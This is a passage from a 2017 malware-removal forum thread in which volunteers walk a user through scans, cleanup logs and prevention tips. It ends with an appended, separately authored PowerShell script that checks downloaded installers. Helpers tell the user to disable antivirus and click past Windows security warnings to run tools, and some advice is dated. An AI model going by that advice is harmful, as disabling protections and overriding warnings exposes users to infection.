Successfully deleted: C:\Users\KEKLR\AppData\Local\{80825A96-AAD6-4DA4-A02D-313BE9C4B36A} (Empty Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\{A5ABE803-5426-49F3-AD6B-318D95D3937D} (Empty Folder)
Successfully deleted: C:\Program Files (x86)\Common Files\homepage protection (Folder)
Successfully deleted: C:\Program Files (x86)\GUTAF36.tmp (File)
Successfully deleted: C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4VQNA5CH (Temporary Internet Files Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F2PYKCEU (Temporary Internet Files Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K514I03L (Temporary Internet Files Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RC1U67T2 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4VQNA5CH (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F2PYKCEU (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K514I03L (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RC1U67T2 (Temporary Internet Files Folder)


Registry: 3

Successfully deleted: HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Search\\SearchAssistant (Registry Value)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Tue 04/11/2017 at 21:56:53.44
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#33 krtate

    Advanced Member

  • Full Member
  • 170 posts

Posted 11 April 2017 - 09:42 PM

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 4/11/17
Scan Time: 10:21 PM
Logfile: scan 4.11.2017.txt
Administrator: Yes

-Software Information-
Version: 3.0.6.1469
Components Version: 1.0.96
Update Package Version: 1.0.1622
License: Trial

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: KEKLR-PC\KEKLR

-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 377074
Time Elapsed: 17 min, 42 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 0
(No malicious items detected)

Registry Value: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 0
(No malicious items detected)

Physical Sector: 0
(No malicious items detected)

(end)



#34 krtate

    Advanced Member

  • Full Member
  • 170 posts

Posted 11 April 2017 - 09:48 PM

I'm no longer getting the message about changing home page.  Ran all scans.  The cleaning even took care of an annoying Epson error when restarting computer.

Will see how it works tomorrow evening. I sure do appreciate all your help. Couldn't have done it without your persistence and knowledge and clear instructions on what to do and how to do it.



#35 Android 8888

    SWI Malware Tracker

  • Helper
  • 865 posts

Posted 12 April 2017 - 05:23 AM

Hello krtate.

You're welcome!

The scans went well and I can see in your logs that the tools cleaned up some stuff related to adware and temporary files.

 

Does it matter that my computer restarted and downloaded updates before I do all the steps above?

Usually the updates are performed after the cleaning process. However, those updates most likely belong to your Windows Operating System, which may have been set to perform updates automatically. Since there were no more traces of the rootkit before the updates started, most likely there will be no problem.


Now, there is some more work to do yet. To ensure that your computer will be completely clean, let's check for leftovers using ESET Online Scanner. It's a very thorough scan and it may take some time to complete but it's worth it.

Please scan your computer with ESET Online Scanner.

  • Click on this link to open ESET Online Scanner in a new window.
    • Click on the Scan Now button to download the esetonlinescanner_enu.exe file. Save it to your Desktop.
    • Close all your programs and browsers.
    • Please disable your antivirus program to avoid potential conflicts, improve the performance and speed up the scan.
    • Double click on esetonlinescanner_enu.exe to start ESET Online Scanner. It will open a window with the Terms of Use.
  • Check mark Download latest version of ESET Online Scanner and click the Accept button.
  • Click Yes to accept any security warnings that may appear.
  • Under Computer scan settings, check mark Enable detection of potentially unwanted applications.
  • Then click Advanced settings and check mark the following options:
    • Enable detection of potentially unsafe applications
    • Clean threats automatically
  • Click the Scan button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats.
  • Click Export, and save the file to your Desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.

Note: If nothing is found, it will not produce a log.

Please re-enable your antivirus program.


Please post the ESET log (if it produced one) and let me know if there are still any issues with the computer.


Thank you.


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#36 krtate (Advanced Member, Full Member, 170 posts)

Posted 12 April 2017 - 05:39 AM

Thank you, I will run this scan later today.



#37 krtate (Advanced Member, Full Member, 170 posts)

Posted 12 April 2017 - 09:13 PM

This is what the ESET scan found:

C:\Users\KEKLR\AppData\LocalLow\Sun\Java\jre1.8.0_31\java_sp.dll a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application cleaned by deleting
C:\Users\KEKLR\Downloads\CuteWriter.exe a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application cleaned by deleting



#38 krtate (Advanced Member, Full Member, 170 posts)

Posted 12 April 2017 - 09:19 PM

I didn't have the options:

  • Click Export, and save the file to your Desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.

I could click on "save to text file", but no Export option, no back button, no finish button.

My options are "do not clean", "clean selected" or "clean all" or just X to close.



#39 Rocket Grannie (SWI Australian Rebel, Administrators, 7,788 posts)

Posted 13 April 2017 - 08:07 PM

Hello krtate

Android 8888 is away for a few days so I will be helping you.

My options are "do not clean", "clean selected" or "clean all" or just X to close.

Please click X to close as it has deleted the two entries it found.

The good news is your computer appears to be clean.

Now some housekeeping:

Please download Security Analysis by Rocket Grannie from here
  • Save it to your Desktop.
  • Close your security software to avoid potential conflicts.
  • Double click RGSA.exe
  • Click OK on the copyright-disclaimer
  • It will produce a log named SALog.txt on the Desktop or in the same folder from where the tool is run if installed elsewhere.
  • Please copy and paste the contents of that log in this topic.

Note: If you get a Warning from Windows about running the program, click on More info and then click Run Anyway to run it even though Windows says it might put your PC at risk.

Download DelFix (by Xplode) and save it to your Desktop.

Close all running programs and start delfix.exe.
Make sure that all available options are checked.
Click on Run
DelFix should remove all our tools and delete itself afterwards.
I don't need to see the log file.

Please post the SALog

How is the computer running now?


Rocket Grannie
 


 
My help is free, but if you wish to help keep these forums running please consider a donation, see here for details.

#40 krtate (Advanced Member, Full Member, 170 posts)

Posted 14 April 2017 - 05:33 AM

Result of Security Analysis by Rocket Grannie (x86) Updated: 5th April, 2017
Running from:C:\Users\KEKLR\Desktop (06:31:51 - 04/14/2017)
***---------------------------------------------------------***
Microsoft Windows 7 Home Premium X64 Service Pack 1
UAC is Enabled!
Internet Explorer 11
Default Browser: Internet Explorer
***------------Antivirus - Antispyware - Firewall-----------***
Microsoft Security Essentials (Disabled - Up to Date)
Malwarebytes (Disabled - Up to Date)
Malwarebytes (Disabled - Up to Date)
Microsoft Security Essentials (Disabled - Up to Date)
Windows Defender (Disabled - Not Up to Date)
Windows Firewall (Enabled)
*No other Firewall Installed*
***-------Security Programs - Browsers - Miscellaneous------***
Adobe Flash Player 24 NPAPI (version 25.0.0.148)
Firefox (version 52)
Google Chrome (version 55)
Malwarebytes (version 3.0.6.1469)
Microsoft Security Essentials (version 4.10)
Microsoft Silverlight (version 5.1)
Windows Live Essentials (version 16.4)

HiJackThis (version 1.0.0) is *out of Date*
Java 8 Update 45 (version 8.0.450) is *out of Date*

***----------------Analysis Complete-------------------------***



#41 Rocket Grannie (SWI Australian Rebel, Administrators, 7,788 posts)

Posted 14 April 2017 - 06:59 PM

Hello krtate

I suggest you uninstall HiJackThis (version 1.0.0) as it is an out of date program.

Please enable all your security programs.

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended https://java.com/en/download/

Be careful not to install malware posing as Java update!
Important: read this blog.
http://blog.trendmic...java-0-day-fix/

Once you have installed the newest version, please remove the old version using Programs and Features in Control Panel.

Are there any further problems?


Rocket Grannie
 



#42 krtate (Advanced Member, Full Member, 170 posts)

Posted 14 April 2017 - 07:54 PM

Thank you, I uninstalled HiJackThis, installed Java and then it uninstalled the old version.

That link doesn't take me to blog TrendMicro, it's still in Spywareforum.

 

Also I see WinPcap 4.1.3 installed 3.15.2017; do you know what that is?

 

Should I have Microsoft Security Essentials running along with the premium trial version of MalwareBytes?

 

I think Trend Micro downloaded it when I scanned in March. I think I selected Home Network scan, I probably don't need that.

 

I also had a USB stick connected to my system to back up some files; do you think the USB stick should be scanned?


Edited by krtate, 14 April 2017 - 08:01 PM.


#43 Rocket Grannie (SWI Australian Rebel, Administrators, 7,788 posts)

Posted 14 April 2017 - 08:31 PM

Hello krtate
 

 

That link doesn't take me to blog TrendMicro, it's still in Spywareforum.

Thank you I have corrected it.

WinPcap4.1.3
It is a program that is used to monitor network traffic by programs such as Wireshark.
For more information please see here
 

 

Should I have Microsoft Security Essentials running along with the premium trial version of MalwareBytes?

No! MSE is only compatible with the free version of MBAM.
If you wish to keep using the premium version of MBAM you need to disable MSE and download an antivirus program that can be run in conjunction with the premium version of MBAM.

All of the following are excellent free antiviruses. Be sure to only install one.

Avast.
Avira
AVG
 

 

I also had a USB stick connected to my system to back up some files; do you think the USB stick should be scanned?

If it was connected during the cleaning of the computer then it has already been scanned.
If it wasn't connected then yes, it needs to be scanned by whichever security programs you decide to keep activated.
Warning: Do not open the USB until after it has been scanned as this could reinfect the computer.

Any further problems?


Rocket Grannie
 



#44 krtate (Advanced Member, Full Member, 170 posts)

Posted 15 April 2017 - 05:59 AM

Thank you, I scanned the USB with Malwarebytes and MSE and found nothing. I had disconnected it, as the instructions early on stated to remove all USB.

Computer seems to be running faster, not having to wait as long to load IE or Firefox.

What exactly could the Rootkit have done, steal passwords?

 

I really appreciate all the help I received.



#45 Rocket Grannie (SWI Australian Rebel, Administrators, 7,788 posts)

Posted 15 April 2017 - 05:57 PM

Hello krtate
 

 

What exactly could the Rootkit have done, steal passwords?

Basically, a rootkit has full and complete access to the computer. For information see: here
 

 

I really appreciate all the help I received.

You are welcome.

 

Below I have included a number of recommendations for how to protect your computer in order to prevent future malware infections.
Please take these recommendations seriously; these few simple steps can stave off the vast majority of spyware problems.
 
Keep your Antivirus program up-to-date.
 
Please note: Many installers offer third-party downloads that are installed automatically when you do not uncheck certain checkboxes. Please uncheck them if you don't want or use them. While most of the time not malicious, you usually do not want these on your computer. Be careful during the installation process and you will avoid seeing tons of new unwanted toolbars in your favorite web browser.
 
Please consider installing and running some of the following programs; they are either free or have free versions of commercial programs:
Keep Malwarebytes updated and perform a regular scan of your system, as it will make it harder for malware to reside on your computer.
A tutorial on using Malwarebytes can be found here
Please note that only the paid-for version has real-time capabilities.
 
A free non-resident utility to prevent the installation of ActiveX-based malware is JavaCool's SpywareBlaster, available here
Please note that the free version of SpywareBlaster needs manual updates.
 
Please keep these programs up-to-date and run them whenever you suspect a problem to prevent malware problems. A number of programs have resident protection and it is a good idea to run the resident protection of one of each type of program to maintain protection. However, it is important to run only one resident program of each type since they can conflict and become less effective. That means only one antivirus, firewall and scanning anti-spyware program at a time. Passive protectors, like SpywareBlaster can be run with any of them.
 
Note that there are a lot of rogue programs out there that want to scare you into giving them your money and some malware actually claims to be security programs. If you get a popup for a security program that you did not install yourself, DO NOT click on it and ask for help immediately. It is very important to run an antivirus and firewall, but you can't always rely on reviews and ads for information. Ask in a security forum that you trust if you are not sure. If you are unsure and looking for anti-spyware programs, you can find out if it is a rogue here:


A similar category of programs is now called "scareware." Scareware programs are active infections that will pop up on your computer and tell you that you are infected. If you look closely, it will usually have a name that looks like it might be legitimate, but it is NOT one of the programs you installed. It tells you to click and install it right away. If you click on any part of it, including the 'X' to close it, you may actually help it infect your computer further. Keeping protection updated and running resident protection can help prevent these infections. If it happens anyway, get offline as quickly as you can. Pull the internet connection cable or shut down the computer if you have to. Contact someone to help by using another computer if possible. These programs are also sometimes called 'rogues', but they are different from the older version of rogues mentioned above.
 
Another most feared threat at the moment is an infection by a Ransomware. A Ransomware infection is a program that ransoms the data or functionality of your computer until you perform an action. This action is typically to pay a ransom in the form of Bitcoins or another payment method. I advise you to read more info on this terrible threat here and here.
 
Please keep your programs up to date. This applies to Adobe Flash Player, Adobe Reader, Java, Microsoft Silverlight, WinPatrol and all your Internet Browsers in particular. Vulnerabilities in these programs are often exploited in order to install malware on your PC. Visiting a prepared web page suffices to infect your system.
Run a program like Personal Software Inspector (PSI) or FileHippo Update Checker to see what programs need to be updated.
Be careful with flash drives, as they can spread infections. See this post on USB/flash drive safety.
 
Stay away from P2P software; even with a clean P2P program, their networks are often riddled with malware.
 
Don't click on attachments or links in e-mail, and read your e-mail in text-only mode for the highest safety.
 
Don't click on links received in instant message programs.
 
A HOSTS file will prevent Internet Explorer from communicating with sites known to be associated with adware or spyware. A good, regularly updated HOSTS file is the MVPS HOSTS File, available here
 
For much more useful information, please also read Tony Klein's excellent article: How did I get infected in the first place
 
Hopefully these steps will help to keep you error free. If you run into more difficulty, we will certainly do what we can to help.
 
Safe Surfing


Rocket Grannie
 



#46 krtate (Advanced Member, Full Member, 170 posts)

Posted 23 April 2017 - 06:10 AM

I downloaded SpywareBlaster, FileHippo, Hosts File and Avira.  When the premium version of Malwarebytes reverts to the free version, what is best to use for antivirus: go back to Microsoft Security Essentials?  I'm not sure what can get run together.

 

Yesterday FileHippo advised I needed to update some programs; if I recall it was Java, Java Environment, Skype, CutePDFWriter, Adobe Air and Firefox Beta.

I updated Java first, then I selected to update Java Environment, Skype, CutePDF Writer, and I think Adobe Air at one time.

Malwarebytes quarantined PUP.Optional.APNToolBar. I don't know which file update this came from. I assume maybe Skype or CutePDF Writer.

Adobe Air and CutePDFWriter didn't update; they're still on the list.  I restarted my computer and ran Malwarebytes again and it quarantined the PUP again plus PUP.Optional.Ask.

I ran again and it was clean; I ran Housecall and it was clean, though Avira quarantined Bonjour.exe from Housecall.

 

Is there a way to scan the update for malicious files before updating using FileHippo to update?

 

I'm restarting one more time and scanning to see if anything is found.

 

Edited to add:  Is it best to subscribe to the Malwarebytes paid version?   Also, Avira must be such a huge file that it takes 3 minutes before I get an internet connection when restarting.


Edited by krtate, 23 April 2017 - 06:29 AM.


#47 krtate (Advanced Member, Full Member, 170 posts)

Posted 23 April 2017 - 07:01 AM

Just completed scanning again and MalwareBytes scan was clean.



#48 Android 8888 (SWI Malware Tracker, Helper, 865 posts)

Posted 23 April 2017 - 07:06 PM

Hello krtate.

 

I'm back.
 

When the premium version of Malwarebytes reverts to the free version, what is best to use for antivirus: go back to Microsoft Security Essentials?  I'm not sure what can get run together.

You can run Microsoft Security Essentials or any of the free antivirus programs listed below along with Malwarebytes Free version. All of them are excellent free antiviruses. Be sure to only install one.

Avast Free Antivirus
Avira Free Antivirus
AVG Free Antivirus


 

I ran again and it was clean, I ran Housecall and it was clean, though Avira quarantined Bonjour.exe from Housecall.

Usually Bonjour.exe is a legitimate file used to find printers and file-sharing servers. That could be a false positive. A false positive occurs when the scanner reports finding a virus when there is in fact no virus present. If you don't trust a file you can also submit it to an online antivirus scan such as VirusTotal. Then, if the scan comes back clean, you can add an 'Exception' for that file in Avira and/or in Housecall.

How to add exceptions for Avira Antivirus
How to add exceptions to Trend Micro Security software

 

Is there a way to scan the update for malicious files before updating using FileHippo to update?

When you perform a manual update of a program (directly from the official program's website), usually you download the latest version of the Installer/Setup file of that program to your computer and then execute it. But before you run it you can either scan the file with your antivirus program or submit it to an online scan with VirusTotal to check whether it is reliable or not.

 

Is it best to subscribe to Malwarebytes paid version?

I would strongly advise you to purchase the premium version. However, this decision is up to you.
Please go here
Scroll down to find a comparison list of the two versions (Free and Premium).

 

Also, Avira must be such a huge file that it takes 3 minutes before I get an internet connection when restarting.

I don't use Avira so I don't know if that behavior is normal or not.
You can try to install and test another antivirus listed above to figure out which one fits your expectations.

 

Just completed scanning again and MalwareBytes scan was clean.

This is a good sign. Through the reports in your previous post it appears your computer is clean.

 

Are there any issues or concerns with your computer?


Android 8888
 

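The pre-run checks Android 8888 describes above (hash the downloaded installer, scan it with the installed antivirus, look it up on VirusTotal) can be done from one PowerShell prompt before double-clicking anything. The following is an added example written for this thread; it is not code from the forum, from Malwarebytes, Microsoft, ESET or any other tool named here. The installer path is a placeholder, the MpCmdRun.exe location is an assumption (the folder where Microsoft Security Essentials normally installs), and Get-FileHash needs PowerShell 4.0 or later on Windows 7.

```powershell
# Added example (not from the thread): checks to run on a downloaded installer
# BEFORE executing it. Returns one object summarising the evidence.
# Assumptions: the installer path passed in is a placeholder; MpCmdRun.exe is
# assumed to be in the Microsoft Security Essentials folder (adjust if Defender
# or another engine is used). Requires PowerShell 4.0+ for Get-FileHash.

function Test-DownloadedInstaller {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        [string] $MpCmdRun = 'C:\Program Files\Microsoft Security Client\MpCmdRun.exe'  # assumed location
    )

    if (-not (Test-Path -LiteralPath $Path)) {
        throw "File not found: $Path"
    }

    # 1. SHA-256 of the file. Compare it with the hash published on the vendor's
    #    download page, or search for it on VirusTotal without uploading the file.
    $hash = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash

    # 2. Authenticode signature. A Valid signature from the publisher you expected
    #    is the strongest offline evidence that the installer was not swapped for a
    #    look-alike. Bundled-toolbar installers (like the Ask toolbar entries ESET
    #    removed earlier in this thread) are frequently unsigned or signed by a
    #    different publisher than the product name suggests.
    $sig    = Get-AuthenticodeSignature -FilePath $Path
    $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(unsigned)' }

    # 3. Mark-of-the-Web. Browser downloads carry a Zone.Identifier alternate data
    #    stream on NTFS; its presence confirms the file came from the Internet zone
    #    and that SmartScreen / AV will treat it as such.
    $zone = Get-Content -LiteralPath $Path -Stream Zone.Identifier -ErrorAction SilentlyContinue

    # 4. On-demand scan of just this file with the installed Microsoft engine.
    #    -ScanType 3 is a custom scan; exit code 0 = no threat, 2 = threat found.
    $scanResult = 'MpCmdRun.exe not found (scan skipped)'
    if (Test-Path -LiteralPath $MpCmdRun) {
        & $MpCmdRun -Scan -ScanType 3 -File $Path | Out-Null
        $scanResult = switch ($LASTEXITCODE) {
            0       { 'clean' }
            2       { 'THREAT FOUND' }
            default { "exit code $LASTEXITCODE" }
        }
    }

    [pscustomobject]@{
        File            = $Path
        SHA256          = $hash
        SignatureStatus = $sig.Status      # Valid, NotSigned, HashMismatch, NotTrusted, ...
        Signer          = $signer
        MarkOfTheWeb    = [bool]$zone
        AvScan          = $scanResult
        PassedChecks    = ($sig.Status -eq 'Valid') -and ($scanResult -eq 'clean')
    }
}

# Usage: point it at the installer you just downloaded (placeholder name below).
Test-DownloadedInstaller -Path "$env:USERPROFILE\Downloads\installer-placeholder.exe" | Format-List
```

PassedChecks being true does not make a file safe, it only means the two checks that can be automated here did not object; the Signer field is the one to read by hand, because a validly signed installer from an unexpected publisher is exactly the bundled-adware pattern seen in the ESET results earlier in this thread.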




